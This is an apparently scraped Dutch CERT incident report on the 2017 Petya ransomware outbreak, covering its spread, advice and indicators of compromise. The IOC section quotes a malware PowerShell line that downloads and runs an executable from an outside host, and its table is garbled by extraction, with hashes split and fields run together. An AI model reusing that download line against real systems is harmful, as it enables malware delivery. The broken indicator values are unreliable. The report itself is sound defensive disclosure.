Petya ransomware aanval

Maat: px

Weergave met pagina beginnen:

Download "Petya ransomware aanval"

Sterre de Coninck
6 jaren geleden
Aantal bezoeken:

1 Petya ransomware aanval Intieel Rapport TLP: [WHITE]

Inhoud 1 Samenvatting... 3 2 Advies... 4 3 IOC s.

2 Inhoud 1 Samenvatting Advies IOC s... 5 Petya ransomware aanval - 27 June TLP: [WHITE] 2

3 1 SAMENVATTING DREIGING SLACHTOFFERS DADERS HOOG wereldwijd bedrijven + onbekend individuen CERT.be ontving informatie via betrouwbare partners dat de Oekraïnische overheid, Russische bedrijven en een containerterminal bedrijf uit Denemarken onder aanval lagen van een nieuwe ransomware aanval. Kort nadien werd de slachtofferlijst aangevuld met bedrijven uit Nederland, Spanje, Frankrijk, Groot-Britanië en België. Het lijkt te gaan over een nieuwe variant van de Petya ransomware die zich (intern) lijkt te verspreiden via de EternalBlue/DoublePulsar exploit 1 voor SMB die vorige maand furore maakte via de ransomware Wannacry. Eenmaal het systeem geïnfecteerd is, verspreidt de ransomware zich verder via een interne Windows toolkit (WMIC) en via een externe beheertool PsExec. De initiële aanvalvector is momenteel onbekend, maar het wordt geopperd dat het zich zou verspreiden via een excel document met een valse Windows signature 2 (LokiBot 3 ). Eenmaal het systeem geïnfecteerd is met de ransomware, probeert het de harde schijf te encrypteren door gebruik te maken van beheerdersrechten. Indien deze niet voorhanden zijn, gebruikt het een kernel exploit, injecteert het zichtzelf in de MBR 4 van de harde schijf en maakt het een scheduled task aan die een herstart uitvoert na één uur. Bij het heropstarten van het systeem laadt de ransomware zich in het geheugen en begint de encryptie. Er is geen killswitch aanwezig en de ransomware communiceert niet met C2 servers 5. Volgende extensies worden geëncrypteerd: ".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd. kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.v di.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip" Na de encryptie krijgt de gebruiker een scherm te zien met volgende boodschap: Huidige informatie wijst erop dat systemen die gepatcht zijn met de wanacry-patch, toch kwetsbaar zijn voor deze ransomware. Momenteel hebben we weet van infecties op Windows XP, 7 en 10 van verschillende patchniveaus Petya ransomware aanval - 27 June TLP: [WHITE] 3

4 2 ADVIES Niet betalen! Het adres is niet langer actief; Patch systemen (in het bijzonder MS17-010); Voorkom Local Administrator rechten voor gewone gebruiker; Zoek naar volgende scheduled task en verwijder: o C:\Windows\system32\shutdown.exe /r /f Houd AV/IDS/IPS up-to-date; Voorzie een Backup strategie; Traditionele beschermingsstrategiën tegen Ransomware Petya ransomware aanval - 27 June TLP: [WHITE] 4

5 3 IOC S Category Type Value url External link 0d b30f6b0d7d3a745// md5 415fe69bf32634ca98fa07633f4118e1 External url b30f6b0d7d3a745?environmentId=100 Order doc External url fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d 206 External vulnerability CVE sha1 101cc1cb56c407d5b9149f2c3b d23ba84 url url sha a0b5ee4b95ddad634dd225dc0f73 md a4daf8eb9660f1c67e30f8b25 Network ip-dst mshta.exe ee29b9c01318a1e23836b949942db14d fdae2f41df9f0dcd922c63 bc6 myguy.xls Network url h11p:// /myguy.xls Network ip-dst PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile('h11p://frenchcooking.com/myguy.exe', '%APPDATA%\10807.exe') ;) exe %APPDATA%\10807.exe %APPDATA%\10807.exe' md5 a1d5895f85751dfe67d19cccb51b051a Petya ransomware aanval - 27 June TLP: [WHITE] 5

6 Network External Analysis domain coffeinoffice.xyz PID: 3096)File Name BCA9D6.exeMD5 Hash Identifier A1D5895F85751DFE67D19CCCB51B051ASHA-1 Hash Identifier 9288FB8E96D419586FC8C595DD95353D48E8A060SHA-256 Hash Identifier 17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB301 7AF1FBDFile Size bytesconnects to the host: COFFEINOFFICE.XYZ 80Pay attention - the trojan on which I give the markers could potentially be used to load the encryption part %APPDATA%\10807.exe sha1 url Sha1 Filepath powershell.exe 9288fb8e96d419586fc8c595dd95353d48e8a060 System.Net.WebClient).DownloadFile('h11p://frenchcooking.com/myguy.exe exe %WINDIR%\System32\mshta.exe C:\myguy.xls.hta BCA9D6.exe 17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1f bd cc450ef5f8c5f ec1fed91f694e0d b30f6b0d7d3a f917aaba5684fbe56d3c57d48ef2a1aa7cf06d 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94 b1 752e5cf9e47509ce51382c88fc4d7e53b5ca44ba22a94063f b362 ca5 dllhost.dat wowsmith123456@posteo.net Petya ransomware aanval - 27 June TLP: [WHITE] 6

Vergelijkbare documenten

Het is voorlopig nog onduidelijk wie achter deze aanvallen zit en wat de initiële infectievector is.

Het is voorlopig nog onduidelijk wie achter deze aanvallen zit en wat de initiële infectievector is. WannaCry TLP: Green 1 CONTEXT Op vrijdag 12/05/2017 is een besmetting met een variant van het WannaCrypt (of Wanna/WaCry) vastgesteld bij verschillende grote bedrijven in Spanje. Kort daarna heeft dezelfde